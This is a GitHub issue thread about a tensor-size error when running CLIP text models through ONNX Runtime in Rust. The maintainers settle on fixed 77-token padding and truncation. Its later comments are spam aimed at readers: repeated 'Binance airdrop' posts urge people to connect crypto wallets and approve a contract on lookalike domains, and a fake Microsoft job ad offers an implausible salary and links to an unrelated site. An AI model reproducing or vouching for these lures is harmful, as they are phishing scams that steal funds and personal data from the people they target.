### ISSUE TITLE
Input tensor size mismatch: Attempting to broadcast an axis by a dimension other than 1

### ISSUE THREAD

**Issue by TilBlechschmidt** [Rorical/clip-as-service-rs#2]
Hey there! 👋 
I tried running this project using `ViT-B-32-laion2b-s34b-b79k` and `ViT-L-14@336px`. However, for both models I received the following error when attempting to generate text embeddings:

```rust
thread 'main' panicked at 'called `Result::unwrap()` on an `Err` value: 
  SessionRun(Msg("

Non-zero status code returned while running Add node. 
Name:'Add_2' 
Status Message: /Users/runner/work/1/s/onnxruntime/core/providers/cpu/math/element_wise_ops.h:560 
void onnxruntime::BroadcastIterator::Append(ptrdiff_t, ptrdiff_t) axis == 1 || axis == largest was false. 
Attempting to broadcast an axis by a dimension other than 1. 4 by 77

   "))
', src/main.rs
```

The error occurs at the following location where the textual model is executed by the ONNX runtime: https://github.com/Rorical/clip-as-service-rs/blob/1f79631e70672c38be6aa03d81b7870dd5864c1a/src/server.rs#L103

After digging a little and comparing it to the example code [found in the OpenCLIP repo](https://github.com/mlfoundations/open_clip#usage), I found that the input tensor should always have [a length of 77](https://github.com/openai/CLIP/blob/main/README.md#cliptokenizetext-unionstr-liststr-context_length77) (padded by `0`).

I am not sure if or why the code works for you as-is but for me applying the following changes solved the issue:

1. *Adjust the tokenizer so that it always pads to a multiple of `77`*
```rust
tokenizer.with_padding(Some(PaddingParams {
    strategy: PaddingStrategy::BatchLongest,
    direction: PaddingDirection::Right,
    pad_to_multiple_of: Some(77), // <-- this right here
    pad_id: 0,
    pad_type_id: 0,
    pad_token: "[PAD]".to_string(),
}));
```
2. *Adjust the definition of the `v1` and `v2` arrays so that the iterator takes at most `77` elements (as the tokenizer might produce any multiple of it)*
```rust
let v1: Vec<i32> = preprocessed
    .iter()
    .map(|i| 
        i.get_ids()
            .iter()
            .take(77) // <-- this right here
            .map(|b| *b as i32)
            .collect()
    )
    .concat();

let v2: Vec<i32> = preprocessed
    .iter()
    .map(|i| {
        i.get_attention_mask()
            .iter()
            .take(77) // <-- this right here
            .map(|b| *b as i32)
            .collect()
    })
    .concat();
```

No idea if this is the best approach but I thought I'd just leave my findings here in case anyone else stumbles across this error (or if you @Rorical encountered this as well) 😊

**Comment by TilBlechschmidt** [comment]
Oh and thanks for publishing this by the way! I am rather new to the whole ML field and probably would have struggled for quite a while before figuring out how to run CLIP in Rust 🦀

**Comment by Rorical** [comment]
Thanks for your contribution! I think this may depend on the model itself.

![](https://github.com/Rorical/clip-as-service-rs/assets/46294886/d426ae88-bdd1-468e-9c35-7e4669738562)
In my case, I used my own fine-tuned model exported from Finetuner, and the model can receive variable sequence length.
However, in both official clip and open clip implementation, the max sequence length is fixed because the max length of tokens in their dataset is 77. The model can only learn position embeddings up to 77.
Whether we should pad or preserve the input sequence really depends on the model we used.

I think the best way is to add a command argument that indicates whether the tokenizer should pad the sequence.

Again, thanks for your help! I'm new to 🦀 and tried to write faster service implementation for the backend of my projects. I haven't expected others to use it, so it still needs more improvements.

**Comment by Rorical** [comment]
commit 20361ad7092fa1d7e4ad93852967a75c4052f2d2

**Comment by TilBlechschmidt** [comment]
Ah that makes a lot of sense! I was not even aware that you could have models with dynamic input lengths 😅

Well then, a warm welcome to the 🦀-club!

Adding the CLI arg looks like a good choice! However, do note that the `.take(77)` shown in the screenshots is required for the edge case where one submits a very long input string. Not necessarily something you might want to add depending on the use case though 🤷

**Comment by Rorical** [comment]
Oops, I forgot. Truncation should also be applied in this case.
I looked at the code again and found that the Tokenizer already provided such functionality:
```rust
pub fn pad_encodings(encodings: &mut [Encoding], params: &PaddingParams) -> Result<()> {
    if encodings.is_empty() {
        return Ok(());
    }

    let mut pad_length = match params.strategy {
        PaddingStrategy::Fixed(size) => size,
        PaddingStrategy::BatchLongest => encodings
            .maybe_par_iter()
            .map(|e| e.get_ids().len())
            .max()
            .unwrap(),
    };

    if let Some(multiple) = params.pad_to_multiple_of {
        if multiple > 0 && pad_length % multiple > 0 {
            pad_length += multiple - pad_length % multiple;
        }
    }

    encodings.maybe_par_iter_mut().for_each(|encoding| {
        encoding.pad(
            pad_length,
            params.pad_id,
            params.pad_type_id,
            &params.pad_token,
            params.direction,
        )
    });

    Ok(())
}
```

So we can use PaddingStrategy::Fixed(77) to do both padding and Truncation.

```rust
tokenizer.with_padding(Some(PaddingParams {
            strategy: if args.pad_token_sequence {
                PaddingStrategy::Fixed(77)
            } else {
                PaddingStrategy::BatchLongest
            },
            direction: PaddingDirection::Right,
            pad_to_multiple_of: None,
            pad_id: 0,
            pad_type_id: 0,
            pad_token: "[PAD]".to_string()
}));
```

**Comment by Rorical** [comment]
Oops, I forgot. Truncation should also be applied in this case.

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by DavidGhedini** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @aliezaheer, @jiyuu-jin, @Keeeeeeeks, @geek4ctrl, @jtourkos, @xiamuguizhi, @codyx

**Comment by dreamjz** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Join us and be part of a team dedicated to driving innovation and success!

## How to Apply:
To apply for this exciting opportunity, please click [here](https://jobsindeed.online).

## Job Description:
- **Position:** Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan
  - Company-contributed retirement plan
  - Flexible working hours
  - Collaborative and inclusive work environment

## Requirements:
- Proven experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Familiarity with frameworks such as React, Angular, or Vue.js
- Problem-solving skills and ability to work in a team

**Note:** This position is open to candidates from anywhere in the world.eyecu201xxx522, @ankurrsinghal, @maciejhirsz, @iHomeSoft, @AndyyyHuang, @Ceelog, @radchukd, @ssandeep, @Asll666, @BuddyK-23, @davidmoradi, @loosie, @berryjam, @JamesQuinley, @coder-zjh, @uu-z, @tylerztl, @pilsy, @liunian-zy, @Ratimon
